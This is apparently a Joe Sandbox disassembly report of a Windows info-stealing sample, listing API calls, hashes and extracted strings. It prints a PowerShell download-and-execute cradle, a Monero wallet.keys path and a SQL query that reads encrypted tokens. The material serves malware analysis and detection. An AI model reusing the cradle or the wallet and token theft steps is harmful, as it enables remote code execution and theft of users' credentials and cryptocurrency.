                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuetask
                  • String ID: Password
                  • API String ID: 775622407-3434357891
                  • Opcode ID: 6e7de123e66707cc283c54c6b84f17af6c3c7a4301ae62df3b334c5abccb28ea
                  • Instruction ID: 8301fb3f806192fec80fd5e2c778d6f625b384f65271dacd72ba634a13a217f3
                  • Opcode Fuzzy Hash: 6e7de123e66707cc283c54c6b84f17af6c3c7a4301ae62df3b334c5abccb28ea
                  • Instruction Fuzzy Hash: 9B612AB59041689BDB24DB50DC45FDAB7B9BF44300F0081E9E689A7241DBB06BC9CFA5
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                  • lstrlen.KERNEL32(00000000), ref: 0062BC9F
                    • Part of subcall function 00638E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00638E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0062BCCD
                  • lstrlen.KERNEL32(00000000), ref: 0062BDA5
                  • lstrlen.KERNEL32(00000000), ref: 0062BDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                   • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 37daff78115e086de37703779ca2798409966682987dca73f9acca98c836923d
                  • Instruction ID: f3a2158acd39e16fe407ac60ae8c37ed1d897f8b23a5a4e04b9b9e1442ff7b1e
                  • Opcode Fuzzy Hash: 37daff78115e086de37703779ca2798409966682987dca73f9acca98c836923d
                  • Instruction Fuzzy Hash: A3B15E72910108ABDB48EBE0DC96EEE733AAF54300F41416CF546B6191EF346A49DFE6
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                   • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: 3f9db084654396ca50d12005707f708da07f6f0613bb6ee3634e82b860076f3e
                  • Instruction ID: acebefb5f38915221a9c23a2a48d9ad4c815377c771e90722e330b9b07c74c60
                  • Opcode Fuzzy Hash: 3f9db084654396ca50d12005707f708da07f6f0613bb6ee3634e82b860076f3e
                  • Instruction Fuzzy Hash: 4BF0583090820DEFD348AFE0E909B6CBBB0FB04703F055198F649A6390EAB04B419FD6
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00624FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00624FD1
                  • InternetOpenA.WININET(00640DDF,00000000,00000000,00000000,00000000), ref: 00624FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00625011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00625041
                  • InternetCloseHandle.WININET(?), ref: 006250B9
                  • InternetCloseHandle.WININET(?), ref: 006250C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                   • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: 09868d944f21f111c79c3ca0701d9423ee96d5f813e031914a9ccc135aba6106
                  • Instruction ID: 2b6fd6e5ee2597e26b4b67da25e18a9a5d85515727f01f4dacae6e23c3215e83
                  • Opcode Fuzzy Hash: 09868d944f21f111c79c3ca0701d9423ee96d5f813e031914a9ccc135aba6106
                  • Instruction Fuzzy Hash: 4731E6B4A00218ABDB24CF54DC85BDDB7B5FB48704F1081D9EA0AB7281D7B06AC58F99
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00638426
                  • wsprintfA.USER32 ref: 00638459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0063847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0063848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00638499
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,0131EFF8,00000000,000F003F,?,00000400), ref: 006384EC
                  • lstrlen.KERNEL32(?), ref: 00638501
                  • RegQueryValueExA.ADVAPI32(00000000,0131EF38,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00640B34), ref: 00638599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00638608
                  • RegCloseKey.ADVAPI32(00000000), ref: 0063861A
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: 3ea77e119ee35176becd42653d7812a665ec4f19f7f096a8b1deb55b37fc883e
                  • Instruction ID: b837986543f6a37844f82e3b14b10f73d915931b2ca9d916b26932d544e4d269
                  • Opcode Fuzzy Hash: 3ea77e119ee35176becd42653d7812a665ec4f19f7f096a8b1deb55b37fc883e
                  • Instruction Fuzzy Hash: 3721E7B1910228AFDB68DB54DC85FE9B3B9FB48700F00C598E649A7241DF71AA85CFD4
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006376A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 006376AB
                  • RegOpenKeyExA.ADVAPI32(80000002,0130C3D8,00000000,00020119,00000000), ref: 006376DD
                  • RegQueryValueExA.ADVAPI32(00000000,0131F070,00000000,00000000,?,000000FF), ref: 006376FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00637708
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: ffdece992fe8acfbe2432f8b36153c9bdea66080f15b6819764a1e3983c23e35
                  • Instruction ID: 51b0f4b74f71a0f1a8e2c8206060a5bcb2a2c28028097b3bd48ea62ae38c7f52
                  • Opcode Fuzzy Hash: ffdece992fe8acfbe2432f8b36153c9bdea66080f15b6819764a1e3983c23e35
                  • Instruction Fuzzy Hash: F90162B5A04208BBEB14DBE4DD4AFADB7B9FB48701F105054FA05F7291E6B19900CF91
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0063773B
                  • RegOpenKeyExA.ADVAPI32(80000002,0130C3D8,00000000,00020119,006376B9), ref: 0063775B
                  • RegQueryValueExA.ADVAPI32(006376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0063777A
                  • RegCloseKey.ADVAPI32(006376B9), ref: 00637784
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 60b6bbe7b49131e3e027c2ece5967426a489378660eacc69c02ca50c95b08d3f
                  • Instruction ID: 8c0ff24665d8b22c21e1eed61b0dc6888ceadcba0c999ec870716947d7cde0b2
                  • Opcode Fuzzy Hash: 60b6bbe7b49131e3e027c2ece5967426a489378660eacc69c02ca50c95b08d3f
                  • Instruction Fuzzy Hash: 6C0144B5A40308BBD704DBE4DC4AFAEB7B8FB44701F104158FA05B7281D6B065008F91
                  APIs
                  • CreateFileA.KERNEL32(:c,80000000,00000003,00000000,00000003,00000080,00000000,?,00633AEE,?), ref: 006392FC
                  • GetFileSizeEx.KERNEL32(000000FF,:c), ref: 00639319
                  • CloseHandle.KERNEL32(000000FF), ref: 00639327
                  Strings
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID: :c$:c
                  • API String ID: 1378416451-4176724484
                  • Opcode ID: edd55d5e4abb91307072e7fad2542054f030706fef85341dc8f2d35a42717bce
                  • Instruction ID: a5f64fe5227e774b12b1fc5689e042629c96d24790ea83d938357f74841a4192
                  • Opcode Fuzzy Hash: edd55d5e4abb91307072e7fad2542054f030706fef85341dc8f2d35a42717bce
                  • Instruction Fuzzy Hash: 75F03C75E44208BBEB14DBB0DC49B9E77FABB48710F118254F651A72C0D6B196018F91
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006299EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00629A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00629A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,0062148F,00000000), ref: 00629A5A
                  • LocalFree.KERNEL32(0062148F), ref: 00629A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00629A9A
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 61b7643ece6369b867f145a1de0c7b2d2e95678eece021778fa14e29323051c3
                  • Instruction ID: 7a8c225e3f94a2625788e3204f38a14d43a72646779ded6068740bab93dad1b4
                  • Opcode Fuzzy Hash: 61b7643ece6369b867f145a1de0c7b2d2e95678eece021778fa14e29323051c3
                  • Instruction Fuzzy Hash: C931F6B4A00209EFDB14CF94D985BEE77B6FF88340F108158E911AB390D775AA41CFA1
                  APIs
                  • lstrcat.KERNEL32(?,0131F3E8), ref: 006347DB
                    • Part of subcall function 00638DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00638E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00634801
                  • lstrcat.KERNEL32(?,?), ref: 00634820
                  • lstrcat.KERNEL32(?,?), ref: 00634834
                  • lstrcat.KERNEL32(?,0130B940), ref: 00634847
                  • lstrcat.KERNEL32(?,?), ref: 0063485B
                  • lstrcat.KERNEL32(?,0131ED50), ref: 0063486F
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 00638D90: GetFileAttributesA.KERNEL32(00000000,?,00621B54,?,?,0064564C,?,?,00640E1F), ref: 00638D9F
                    • Part of subcall function 00634570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00634580
                    • Part of subcall function 00634570: RtlAllocateHeap.NTDLL(00000000), ref: 00634587
                    • Part of subcall function 00634570: wsprintfA.USER32 ref: 006345A6
                    • Part of subcall function 00634570: FindFirstFileA.KERNEL32(?,?), ref: 006345BD
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: e38049fcdc02bfad43f1839ef99001aa3c62e162deb85699a85b8f7e6c6fa71f
                  • Instruction ID: 7ef04fbc61c7e57d2729aaebfeb9862cd140334cc80191e49d35008c8bf41a4e
                  • Opcode Fuzzy Hash: e38049fcdc02bfad43f1839ef99001aa3c62e162deb85699a85b8f7e6c6fa71f
                  • Instruction Fuzzy Hash: 56314FB29003186BCB54FBA0DC85EED7379BB58700F404599B359A7081EEB4E6898F99
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00632D85
                  Strings
                  • <, xrefs: 00632D39
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00632CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00632D04
                  • ')", xrefs: 00632CB3
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 28b499797caf4a7c0ddf9658c9f66a3c2d95d2b4d9429114e22f6a1e95ba2fb8
                  • Instruction ID: f3347297e0c0bbcb095688d8074b39666ab1273e80edc764370023614024699a
                  • Opcode Fuzzy Hash: 28b499797caf4a7c0ddf9658c9f66a3c2d95d2b4d9429114e22f6a1e95ba2fb8
                  • Instruction Fuzzy Hash: 5541AC71810208AADB54EBE0C892BEDB776AF14300F40411DF556B7192DF746A4ADFD6
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00629F41
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  Strings
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 903981e0d216766f34f7366094581f4f63f9394438bb32d68811539dd00616a3
                  • Instruction ID: 7bc801b0ab40b6a81f4de0b74c907b6cee43bfe15461e891731b58dbb7ae4f54
                  • Opcode Fuzzy Hash: 903981e0d216766f34f7366094581f4f63f9394438bb32d68811539dd00616a3
                  • Instruction Fuzzy Hash: 24616070A00218EBDB24EFA4DD96FED7776AF44304F008118F94A5F181EBB06A46CF96
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,0131ED30,00000000,00020119,?), ref: 006340F4
                  • RegQueryValueExA.ADVAPI32(?,0131F1D8,00000000,00000000,00000000,000000FF), ref: 00634118
                  • RegCloseKey.ADVAPI32(?), ref: 00634122
                  • lstrcat.KERNEL32(?,00000000), ref: 00634147
                  • lstrcat.KERNEL32(?,0131F388), ref: 0063415B
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValue
                  • String ID:
                  • API String ID: 690832082-0
                  • Opcode ID: 68faad84f283910e030c9af3d8cf71a723f847164c2aec421140aa23c869007f
                  • Instruction ID: 9aa23cbe8eb038e20113d80a0df4eaf558d12053e4b42503a1931b4bff43103e
                  • Opcode Fuzzy Hash: 68faad84f283910e030c9af3d8cf71a723f847164c2aec421140aa23c869007f
                  • Instruction Fuzzy Hash: BF4178B69001186BDB18EBA0EC56FED733EBB58300F00455DB61567181EAB55B888FD2
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00637E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,0130C2F8,00000000,00020119,?), ref: 00637E5E
                  • RegQueryValueExA.ADVAPI32(?,0131ECD0,00000000,00000000,000000FF,000000FF), ref: 00637E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00637E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: f7d8f93ec38749bfa1c9a4bae8aa19010486223703350ce1219275cac6421f49
                  • Instruction ID: 7cb761aa1b6732092346b3675fdc4b892f616749e996ac244ccd4056531f104f
                  • Opcode Fuzzy Hash: f7d8f93ec38749bfa1c9a4bae8aa19010486223703350ce1219275cac6421f49
                  • Instruction Fuzzy Hash: 85115EB1A44205EBDB14CF94DD4AFBBBBB9FB44B10F104159F606A7280D7B468018FE2
                  APIs
                  • StrStrA.SHLWAPI(0131F118,?,?,?,0063140C,?,0131F118,00000000), ref: 0063926C
                  • lstrcpyn.KERNEL32(0086AB88,0131F118,0131F118,?,0063140C,?,0131F118), ref: 00639290
                  • lstrlen.KERNEL32(?,?,0063140C,?,0131F118), ref: 006392A7
                  • wsprintfA.USER32 ref: 006392C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: c0fd70f8f8a4cea33180b5ad90ee982fd20fb8b2666a2fa376550d374546697a
                  • Instruction ID: 7c9c784b78801777347dc77dcd053471b57839536c11b87508865d918da538a5
                  • Opcode Fuzzy Hash: c0fd70f8f8a4cea33180b5ad90ee982fd20fb8b2666a2fa376550d374546697a
                  • Instruction Fuzzy Hash: 5601A975500208FFCB08DFE8C984EAE7BB9FB44364F158148F909AB304C671AA40DF91
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006212B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 006212BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006212D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006212F5
                  • RegCloseKey.ADVAPI32(?), ref: 006212FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 7a35b5dd4658a7efc5a60f907ca8bea9e897ded65e28d79e3c64e860fde6a619
                  • Instruction ID: 4793aa933f74eeb1f2da8771e23d12ae6a25da779cda4a48c9c35e4cd85a0378
                  • Opcode Fuzzy Hash: 7a35b5dd4658a7efc5a60f907ca8bea9e897ded65e28d79e3c64e860fde6a619
                  • Instruction Fuzzy Hash: B70136B5A40208BBDB04DFD0DC49FAEB7B8FB48701F008155FA05A7280D6B1AA018F51
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Type
                  • String ID:
                  • API String ID: 2109742289-3916222277
                  • Opcode ID: eb5ba1ab7fef1b4a727fd5d1b1728c25655edda6d1e9612c52de750500334a13
                  • Instruction ID: 45bfd1e260ac3ad4a60147d7d48dcd25bee685822e76ea234f203fccb8bb2c6d
                  • Opcode Fuzzy Hash: eb5ba1ab7fef1b4a727fd5d1b1728c25655edda6d1e9612c52de750500334a13
                  • Instruction Fuzzy Hash: EC4126B150079C5EDB218B24CC84FFBBBEA9F45314F1444ECE9CA96182D2719B45DFA4
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00636663
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00636726
                  • ExitProcess.KERNEL32 ref: 00636755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: feb5f370014f35dc1d0234a4f36f1e02210f7932a086ac704ba736d84797ae48
                  • Instruction ID: 5db7e29f2edfb08bb5f84e4b1327b60812a61f8c43a5e7da437ecb746ce423b3
                  • Opcode Fuzzy Hash: feb5f370014f35dc1d0234a4f36f1e02210f7932a086ac704ba736d84797ae48
                  • Instruction Fuzzy Hash: 61312DB1801218AADB54EB90DC96BDD7779BF04300F405199F20677191DF746B48CF9A
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00640E28,00000000,?), ref: 0063882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00638836
                  • wsprintfA.USER32 ref: 00638850
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 78963dd27d61fcf9d71b7ad3a48947d31259763ff8bf981b8277428a7cff5241
                  • Instruction ID: 3339e30306bcef865132f669db2d963b7a90c617f686071ac87b6dc32e65662b
                  • Opcode Fuzzy Hash: 78963dd27d61fcf9d71b7ad3a48947d31259763ff8bf981b8277428a7cff5241
                  • Instruction Fuzzy Hash: 2E2100B1A44204AFDB04DFD4DD45FAEBBB9FB48711F114119F605B7280CBB9A9018FA5
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0063951E,00000000), ref: 00638D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00638D62
                  • wsprintfW.USER32 ref: 00638D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 3c3b1dd03e3ea7ec1e150a698e66982fd761af5a3bcc44a51ab3b9472dc17f2c
